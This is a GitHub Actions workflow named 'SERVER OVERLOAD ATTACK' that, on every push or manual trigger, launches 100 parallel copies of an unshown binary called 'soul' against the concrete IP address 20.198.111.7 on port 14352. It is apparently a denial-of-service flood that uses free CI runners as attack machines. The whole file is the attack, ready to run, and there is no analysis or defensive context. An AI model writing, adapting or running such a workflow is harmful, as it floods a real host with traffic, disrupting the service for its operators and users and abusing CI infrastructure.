name: SERVER OVERLOAD ATTACK
on: [workflow_dispatch, push]

jobs:
  server_overload:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - run: chmod +x soul
      - run: |
          for i in {1..100}; do
            ./soul 20.198.111.7 14352 120 4000 &
          done
          wait
